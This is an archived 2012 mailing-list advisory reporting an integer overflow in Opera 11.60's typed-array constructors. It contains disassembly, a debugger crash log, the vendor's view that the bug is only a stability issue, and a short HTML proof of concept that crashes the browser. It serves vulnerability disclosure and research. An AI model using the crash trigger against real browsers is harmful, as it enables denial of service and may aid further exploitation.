lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4F29F6B9.2060906@gmail.com>
Date: Thu, 02 Feb 2012 10:36:41 +0800
From: Code Audit Labs <vulnhunt@...il.com>
To: cve@...re.org, full-disclosure@...ts.grok.org.uk,
  bugtraq@...urityfocus.com
Subject: [CAL-2012-0004] opera array integer overflow

CAL-2012-0004 opera array integer overflow


1 Affected Products
=================
11.60 and prior


2 Vulnerability Details
=====================

Code Audit Labs http://www.vulnhunt.com has discovered a integer 
overflow  vulnerability in array functions like
Int32Array,Int16Array... .

Opear vendor say "We have reproduced the problem, and determined that it 
does not have any security implications, since the crash is a caused by 
a memory fill operation which the webpage have no control over, and this 
operation will always crash. It is therefore classified as a stability 
issue, not a security issue. "


we still insist on that  it is a security issue or not should accord to 
root cause of this bug instead of is it exploitable or not. because you 
think it is unexploitable, someone can exploit it via deeply research.

So if most people of Security Community think this is a security issue,
please assign to a CVE number.


3 Analysis
=========
Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x*2  >2
2:x*2!=00
3: (x*2-1)+0x1f overflow 32bits.

so the length of malloc is (x*2-1)+0x1f
memset(eax+0x10,0,x*2) cause memory corrupt


text:5C769F57
.text:5C769F57 loc_5C769F57:                           ; CODE XREF: 
sub_5C769DCE+17C.j
.text:5C769F57                 mov     eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B                 imul    eax, [esp+48h+var_3C] ; var_3C is 
80000001
.text:5C769F60                 cmp     eax, [esp+48h+var_3C]
.text:5C769F64                 jb      short loc_5C769F37
.text:5C769F66                 mov     [esp+48h+size], eax
.text:5C769F6A                 mov     eax, [ebp+arg_0]
.text:5C769F6D                 call    sub_5C14A6E8
.text:5C769F72                 push    [esp+48h+size]  ; size
.text:5C769F76                 push    dword ptr [eax] ; int
.text:5C769F78                 push    [ebp+arg_0]     ; int
.text:5C769F7B                 call    sub_5C765B6D
.text:5C769F80                 add     esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0           = dword ptr  4
.text:5C46A598 size            = dword ptr  8
.text:5C46A598
.text:5C46A598                 mov     edx, [esp+arg_0]
.text:5C46A59C                 push    esi
.text:5C46A59D                 mov     esi, [esp+4+size]
.text:5C46A5A1                 test    esi, esi
.text:5C46A5A3                 jz      short loc_5C46A5AA
.text:5C46A5A5                 lea     eax, [esi-1]
.text:5C46A5A8                 jmp     short loc_5C46A5AC
.text:5C46A5AA ; 
---------------------------------------------------------------------------
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA:                           ; CODE XREF: 
sub_5C46A598+B.j
.text:5C46A5AA                 xor     eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC:                           ; CODE XREF: 
sub_5C46A598+10.j
.text:5C46A5AC                 mov     ecx, [edx+8]
.text:5C46A5AF                 add     eax, 1Fh
.text:5C46A5B2                 push    0
.text:5C46A5B4                 and     eax, 0FFFFFFF8h
.text:5C46A5B7                 push    eax
.text:5C46A5B8                 push    edx
.text:5C46A5B9                 call    sub_5C019DA0

ext:5C765BF7 loc_5C765BF7:                           ; CODE XREF: 
sub_5C765B6D+50.j
.text:5C765BF7                 push    [ebp+size]      ; size
.text:5C765BFA                 lea     eax, [ebx+10h]
.text:5C765BFD                 push    0               ; c
.text:5C765BFF                 push    eax             ; dst
.text:5C765C00                 call    memset




4 Exploitable?
============
who known?


5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0         nv up ei pl nz na 
pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 
efl=00010207
*** ERROR: Symbol file could not be found.  Defaulted to export symbols 
for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150      movdqa  xmmword ptr [ecx+50h],xmm0 
ds:0023:03680000=????????????????????????????????
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
    ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
    Parameter[0]: 00000001
    Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be 
wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c



6 POC:
====
open a html with following content

<script>
//这些全是crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>




7 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ